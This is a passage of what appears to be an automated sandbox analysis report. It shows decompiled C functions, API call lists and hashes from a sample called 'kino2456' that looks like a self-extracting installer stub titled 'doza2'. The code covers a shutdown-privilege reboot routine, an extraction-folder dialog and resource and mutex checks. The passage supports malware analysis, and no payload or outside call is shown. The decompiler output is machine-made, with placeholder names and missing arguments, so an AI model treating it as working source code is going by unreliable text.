								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E009644B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00966CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E009644B9(0, 0x522, 0x961140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00961EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                    0x00961f90
                                                                                                                                                                                                                                    0x00961f90
                                                                                                                                                                                                                                    0x00961f93
                                                                                                                                                                                                                                    0x00961f98
                                                                                                                                                                                                                                    0x00961fa4
                                                                                                                                                                                                                                    0x00961fa7
                                                                                                                                                                                                                                    0x00961fc5
                                                                                                                                                                                                                                    0x00961fcd
                                                                                                                                                                                                                                    0x00961fdb
                                                                                                                                                                                                                                    0x00961ee5
                                                                                                                                                                                                                                    0x00961eea
                                                                                                                                                                                                                                    0x00961ef1
                                                                                                                                                                                                                                    0x00961ef4
                                                                                                                                                                                                                                    0x00961f0c
                                                                                                                                                                                                                                    0x00961f2e
                                                                                                                                                                                                                                    0x00961f3a
                                                                                                                                                                                                                                    0x00961f46
                                                                                                                                                                                                                                    0x00961f4d
                                                                                                                                                                                                                                    0x00961f58
                                                                                                                                                                                                                                    0x00961f60
                                                                                                                                                                                                                                    0x00961f61
                                                                                                                                                                                                                                    0x00961f62
                                                                                                                                                                                                                                    0x00961f75
                                                                                                                                                                                                                                    0x00961f80
                                                                                                                                                                                                                                    0x00961f77
                                                                                                                                                                                                                                    0x00961f77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961f77
                                                                                                                                                                                                                                    0x00961f64
                                                                                                                                                                                                                                    0x00961f64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961f64
                                                                                                                                                                                                                                    0x00961f0e
                                                                                                                                                                                                                                    0x00961f0e
                                                                                                                                                                                                                                    0x00961f13
                                                                                                                                                                                                                                    0x00961f13
                                                                                                                                                                                                                                    0x00961f14
                                                                                                                                                                                                                                    0x00961f14
                                                                                                                                                                                                                                    0x00961f16
                                                                                                                                                                                                                                    0x00961f17
                                                                                                                                                                                                                                    0x00961f1a
                                                                                                                                                                                                                                    0x00961f1f
                                                                                                                                                                                                                                    0x00961f1f
                                                                                                                                                                                                                                    0x00961f86
                                                                                                                                                                                                                                    0x00961f8f
                                                                                                                                                                                                                                    0x00961fcf
                                                                                                                                                                                                                                    0x00961fd3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961fd3
                                                                                                                                                                                                                                    0x00961fa9
                                                                                                                                                                                                                                    0x00961fb4
                                                                                                                                                                                                                                    0x00961fbb
                                                                                                                                                                                                                                    0x00961fc3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961fc3
                                                                                                                                                                                                                                    0x00961f9a
                                                                                                                                                                                                                                    0x00961f9a
                                                                                                                                                                                                                                    0x00961fa2
                                                                                                                                                                                                                                    0x00961fd9
                                                                                                                                                                                                                                    0x00961fda
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00961EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00961F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00961FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: 4df4f9d11d9b41004e34f38994ae211da847427eeba9f702a4f1a27764a003ad
                                                                                                                                                                                                                                    • Instruction ID: 0dc456a49bebb203a80b234c801e2ca2d4e4f937f4caa0a0f767cde40932968d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4df4f9d11d9b41004e34f38994ae211da847427eeba9f702a4f1a27764a003ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5321DB71B48205BBDB309BE19C4AFBF77BCEBD6B10F14041DFA02E6181DB798801A661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00966CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00966CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                    0x00966cf7
                                                                                                                                                                                                                                    0x00966d00
                                                                                                                                                                                                                                    0x00966d19

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00966E26,00961000), ref: 00966CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00966E26,?,00966E26,00961000), ref: 00966D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00966E26,00961000), ref: 00966D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00966E26,00961000), ref: 00966D12
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: 77907fb4cede64bd901cc6ba61d645b809fc2df709638e4088cfbb70401721fb
                                                                                                                                                                                                                                    • Instruction ID: 7c4b99575da34a17ddcf0112379d116621942e7293aa0bd3fa39519d7b284697
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77907fb4cede64bd901cc6ba61d645b809fc2df709638e4088cfbb70401721fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34D0123201C108BBDB002BF1EC0CA593F28FB4A322F464008F31DA2020CBB29851EF53
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E00963210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E009643D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x969a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9691e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E009644B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x9691e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x9691e5 - 3;
						if(_t49 - 0x9691e5 < 3) {
							goto L32;
						}
						_t24 =  *0x9691e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x9691e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0096658A(0x9691e4, 0x104, 0x961140);
								_t27 = E009658C8(0x9691e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x9691e4 - 0x5c;
									if( *0x9691e4 != 0x5c) {
										L30:
										_t30 = E0096597D(0x9691e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x9691e5 - 0x5c;
									if( *0x9691e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E009644B9(_t64, 0x54a, 0x9691e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x9691e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x9691e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x9691e4 - 0x5c;
						if( *0x9691e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x969124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x969a3c, 0x3e8, 0x968598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00964224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9687a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E009644B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                    0x0096321b
                                                                                                                                                                                                                                    0x0096321e
                                                                                                                                                                                                                                    0x00963221
                                                                                                                                                                                                                                    0x0096343c
                                                                                                                                                                                                                                    0x0096343e
                                                                                                                                                                                                                                    0x0096343f
                                                                                                                                                                                                                                    0x00963445
                                                                                                                                                                                                                                    0x00963447
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963447
                                                                                                                                                                                                                                    0x00963229
                                                                                                                                                                                                                                    0x0096322a
                                                                                                                                                                                                                                    0x0096322f
                                                                                                                                                                                                                                    0x009633ec
                                                                                                                                                                                                                                    0x009633f7
                                                                                                                                                                                                                                    0x00963410
                                                                                                                                                                                                                                    0x00963416
                                                                                                                                                                                                                                    0x0096341d
                                                                                                                                                                                                                                    0x0096342d
                                                                                                                                                                                                                                    0x0096342d
                                                                                                                                                                                                                                    0x00963438
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963438
                                                                                                                                                                                                                                    0x00963237
                                                                                                                                                                                                                                    0x00963243
                                                                                                                                                                                                                                    0x00963243
                                                                                                                                                                                                                                    0x00963246
                                                                                                                                                                                                                                    0x009632ee
                                                                                                                                                                                                                                    0x009632f4
                                                                                                                                                                                                                                    0x009632f6
                                                                                                                                                                                                                                    0x009633d4
                                                                                                                                                                                                                                    0x009633d6
                                                                                                                                                                                                                                    0x009633db
                                                                                                                                                                                                                                    0x009633dc
                                                                                                                                                                                                                                    0x009633de
                                                                                                                                                                                                                                    0x009633df
                                                                                                                                                                                                                                    0x00963370
                                                                                                                                                                                                                                    0x00963372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963372
                                                                                                                                                                                                                                    0x009632fc
                                                                                                                                                                                                                                    0x00963301
                                                                                                                                                                                                                                    0x00963301
                                                                                                                                                                                                                                    0x00963303
                                                                                                                                                                                                                                    0x00963304
                                                                                                                                                                                                                                    0x00963304
                                                                                                                                                                                                                                    0x0096330a
                                                                                                                                                                                                                                    0x0096330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963313
                                                                                                                                                                                                                                    0x00963318
                                                                                                                                                                                                                                    0x0096331a
                                                                                                                                                                                                                                    0x00963331
                                                                                                                                                                                                                                    0x00963332
                                                                                                                                                                                                                                    0x0096333a
                                                                                                                                                                                                                                    0x0096333d
                                                                                                                                                                                                                                    0x0096337c
                                                                                                                                                                                                                                    0x00963388
                                                                                                                                                                                                                                    0x0096338f
                                                                                                                                                                                                                                    0x00963394
                                                                                                                                                                                                                                    0x00963396
                                                                                                                                                                                                                                    0x009633a4
                                                                                                                                                                                                                                    0x009633ab
                                                                                                                                                                                                                                    0x009633b6
                                                                                                                                                                                                                                    0x009633be
                                                                                                                                                                                                                                    0x009633c3
                                                                                                                                                                                                                                    0x009633c5
                                                                                                                                                                                                                                    0x00963435
                                                                                                                                                                                                                                    0x00963437
                                                                                                                                                                                                                                    0x00963437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963437
                                                                                                                                                                                                                                    0x009633c7
                                                                                                                                                                                                                                    0x009633c9
                                                                                                                                                                                                                                    0x009633cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009633cc
                                                                                                                                                                                                                                    0x009633ad
                                                                                                                                                                                                                                    0x009633b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009633b4
                                                                                                                                                                                                                                    0x00963398
                                                                                                                                                                                                                                    0x00963399
                                                                                                                                                                                                                                    0x0096339b
                                                                                                                                                                                                                                    0x0096339c
                                                                                                                                                                                                                                    0x0096339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096339d
                                                                                                                                                                                                                                    0x0096334c
                                                                                                                                                                                                                                    0x00963351
                                                                                                                                                                                                                                    0x00963354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096335c
                                                                                                                                                                                                                                    0x00963362
                                                                                                                                                                                                                                    0x00963364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963366
                                                                                                                                                                                                                                    0x00963367
                                                                                                                                                                                                                                    0x00963369
                                                                                                                                                                                                                                    0x0096336a
                                                                                                                                                                                                                                    0x0096336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096336b
                                                                                                                                                                                                                                    0x0096331c
                                                                                                                                                                                                                                    0x00963323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963329
                                                                                                                                                                                                                                    0x0096332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096332b
                                                                                                                                                                                                                                    0x0096324c
                                                                                                                                                                                                                                    0x0096324c
                                                                                                                                                                                                                                    0x0096324f
                                                                                                                                                                                                                                    0x009632c8
                                                                                                                                                                                                                                    0x009632ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632ce
                                                                                                                                                                                                                                    0x00963251
                                                                                                                                                                                                                                    0x00963256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963271
                                                                                                                                                                                                                                    0x00963277
                                                                                                                                                                                                                                    0x00963279
                                                                                                                                                                                                                                    0x00963298
                                                                                                                                                                                                                                    0x0096329d
                                                                                                                                                                                                                                    0x0096329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632b0
                                                                                                                                                                                                                                    0x009632b6
                                                                                                                                                                                                                                    0x009632b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009632be
                                                                                                                                                                                                                                    0x00963280
                                                                                                                                                                                                                                    0x00963289
                                                                                                                                                                                                                                    0x0096328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096328e
                                                                                                                                                                                                                                    0x0096327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096327b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00968598,00000200), ref: 00963271
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 009633E2
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 009633F7
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00963410
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00963426
                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0096342D
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0096343F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$doza2
                                                                                                                                                                                                                                    • API String ID: 2418873061-1966320441
                                                                                                                                                                                                                                    • Opcode ID: 84b7c21788ba5d125c0d1f049d1e3acf1c64b53191fac2ee513043c261d54d39
                                                                                                                                                                                                                                    • Instruction ID: f76c85fca5b728782a88eb6a227e96a715a1039c5ac0cbd9ed89bed7c0856f45
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84b7c21788ba5d125c0d1f049d1e3acf1c64b53191fac2ee513043c261d54d39
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6551263039824077FB215B355C8DF7B695CDB96B54F90C52CF206E62E1DEE88A01A761
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00962CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00962CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x968004; // 0xf4cc89a0
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x969a3c = __ecx;
				memset(0x969140, 0, 0x8fc);
				memset(0x968a20, 0, 0x32c);
				memset(0x9688c0, 0, 0x104);
				 *0x9693ec = 1;
				_t20 = E0096468F("TITLE", 0x969154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x96858c = _t27;
					SetEvent(_t27);
					_t64 = 0x969a34;
					if(E0096468F("EXTRACTOPT", 0x969a34, 4) != 0) {
						if(( *0x969a34 & 0x000000c0) == 0) {
							L12:
							 *0x969120 =  *0x969120 & _t65;
							if(E00965C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x968a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x968184 != 0) {
										__imp__#17();
									}
									if( *0x968a24 == 0) {
										_t57 = _t65;
										if(E009636EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x969a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x969a34 & 0x00000100) == 0 || ( *0x968a38 & 0x00000001) != 0 || E009618A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00966517(_t57, 0x7d6, _t34, E009619E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00962390(0x968a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E009644B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0096468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x968588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x969a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E009644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E009644B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x968588);
										 *0x969124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x969124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00966CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                    0x00962cb5
                                                                                                                                                                                                                                    0x00962cbc
                                                                                                                                                                                                                                    0x00962cc7
                                                                                                                                                                                                                                    0x00962cc9
                                                                                                                                                                                                                                    0x00962cd1
                                                                                                                                                                                                                                    0x00962cd3
                                                                                                                                                                                                                                    0x00962cd9
                                                                                                                                                                                                                                    0x00962ce9
                                                                                                                                                                                                                                    0x00962cf9
                                                                                                                                                                                                                                    0x00962d0e
                                                                                                                                                                                                                                    0x00962d15
                                                                                                                                                                                                                                    0x00962d1c
                                                                                                                                                                                                                                    0x00962ef3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962d2d
                                                                                                                                                                                                                                    0x00962d34
                                                                                                                                                                                                                                    0x00962d3b
                                                                                                                                                                                                                                    0x00962d40
                                                                                                                                                                                                                                    0x00962d48
                                                                                                                                                                                                                                    0x00962d59
                                                                                                                                                                                                                                    0x00962d84
                                                                                                                                                                                                                                    0x00962e1f
                                                                                                                                                                                                                                    0x00962e1f
                                                                                                                                                                                                                                    0x00962e2e
                                                                                                                                                                                                                                    0x00962e41
                                                                                                                                                                                                                                    0x00962e5a
                                                                                                                                                                                                                                    0x00962e62
                                                                                                                                                                                                                                    0x00962e6c
                                                                                                                                                                                                                                    0x00962e6c
                                                                                                                                                                                                                                    0x00962e75
                                                                                                                                                                                                                                    0x00962e77
                                                                                                                                                                                                                                    0x00962e77
                                                                                                                                                                                                                                    0x00962e84
                                                                                                                                                                                                                                    0x00962e8b
                                                                                                                                                                                                                                    0x00962e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962e96
                                                                                                                                                                                                                                    0x00962e96
                                                                                                                                                                                                                                    0x00962e9e
                                                                                                                                                                                                                                    0x00962ea2
                                                                                                                                                                                                                                    0x00962eba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962ece
                                                                                                                                                                                                                                    0x00962ede
                                                                                                                                                                                                                                    0x00962eed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962eed
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962eef
                                                                                                                                                                                                                                    0x00962ea2
                                                                                                                                                                                                                                    0x00962e86
                                                                                                                                                                                                                                    0x00962e88
                                                                                                                                                                                                                                    0x00962e88
                                                                                                                                                                                                                                    0x00962e43
                                                                                                                                                                                                                                    0x00962e48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962e48
                                                                                                                                                                                                                                    0x00962e30
                                                                                                                                                                                                                                    0x00962e30
                                                                                                                                                                                                                                    0x00962ef8
                                                                                                                                                                                                                                    0x00962f01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962f01
                                                                                                                                                                                                                                    0x00962d8a
                                                                                                                                                                                                                                    0x00962d8f
                                                                                                                                                                                                                                    0x00962da1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962da3
                                                                                                                                                                                                                                    0x00962dae
                                                                                                                                                                                                                                    0x00962db4
                                                                                                                                                                                                                                    0x00962dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962dca
                                                                                                                                                                                                                                    0x00962dd3
                                                                                                                                                                                                                                    0x00962df5
                                                                                                                                                                                                                                    0x00962e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962dd5
                                                                                                                                                                                                                                    0x00962dde
